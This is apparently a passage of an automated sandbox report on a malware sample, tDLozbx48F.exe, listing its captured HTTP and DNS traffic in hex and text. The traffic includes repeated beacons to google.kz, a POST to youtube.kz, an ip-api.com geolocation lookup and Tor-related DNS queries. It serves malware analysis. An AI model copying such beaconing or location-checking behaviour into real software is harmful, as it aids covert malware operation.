Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /5N5Gv78Z7d?s=194 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /5N5Gv78Z7d?s=194 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5N5Gv78Z7d?s=194 HTTP/1.1Host: google.kzConnection: Keep-Alive

Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-3919d74" href="https://www.linkedin.com/company/cyble-global/" target="_blank"> equals www.linkedin.com (Linkedin)
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-1d5fe72" href="https://www.youtube.com/@cybleglobal" target="_blank"> equals www.youtube.com (Youtube)
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {"@context":"https:\/\/schema.org\/","@type":"Corporation","@id":"https:\/\/cyble.com#Organization","name":"Cyble","url":"https:\/\/cyble.com","sameAs":["https:\/\/www.linkedin.com\/company\/cyble-global\/","https:\/\/x.com\/cybleglobal","https:\/\/www.facebook.com\/cybleglobal\/","https:\/\/instagram.com\/cybleglobal"],"legalName":"Cyble Inc","logo":{"@type":"ImageObject","url":"https:\/\/i0.wp.com\/cyble.com\/wp-content\/uploads\/2024\/01\/cropped-Cyble-Threat-Intelligence.png?fit=870290&ssl=1","width":"870","height":"290"},"contactPoint":{"@type":"ContactPoint","contactType":"sales","telephone":"+1 888 673 2067","url":"https:\/\/cyble.com\/talk-to-sales\/"}}] equals www.facebook.com (Facebook)
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {"@context":"https:\/\/schema.org\/","@type":"Corporation","@id":"https:\/\/cyble.com#Organization","name":"Cyble","url":"https:\/\/cyble.com","sameAs":["https:\/\/www.linkedin.com\/company\/cyble-global\/","https:\/\/x.com\/cybleglobal","https:\/\/www.facebook.com\/cybleglobal\/","https:\/\/instagram.com\/cybleglobal"],"legalName":"Cyble Inc","logo":{"@type":"ImageObject","url":"https:\/\/i0.wp.com\/cyble.com\/wp-content\/uploads\/2024\/01\/cropped-Cyble-Threat-Intelligence.png?fit=870290&ssl=1","width":"870","height":"290"},"contactPoint":{"@type":"ContactPoint","contactType":"sales","telephone":"+1 888 673 2067","url":"https:\/\/cyble.com\/talk-to-sales\/"}}] equals www.linkedin.com (Linkedin)

Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: archive.torproject.org
Source: global traffic	DNS traffic detected: DNS query: cybereason.com
Source: global traffic	DNS traffic detected: DNS query: youtube.kz
Source: global traffic	DNS traffic detected: DNS query: google.kz
Source: global traffic	DNS traffic detected: DNS query: blog.cyble.com
Source: global traffic	DNS traffic detected: DNS query: cyware.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: cyble.com
Source: global traffic	DNS traffic detected: DNS query: x.com

Source: unknown

HTTP traffic detected: POST /G4XvFNPg1L?27=1 HTTP/1.1Host: youtube.kzContent-Length: 27Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:51:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:51:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 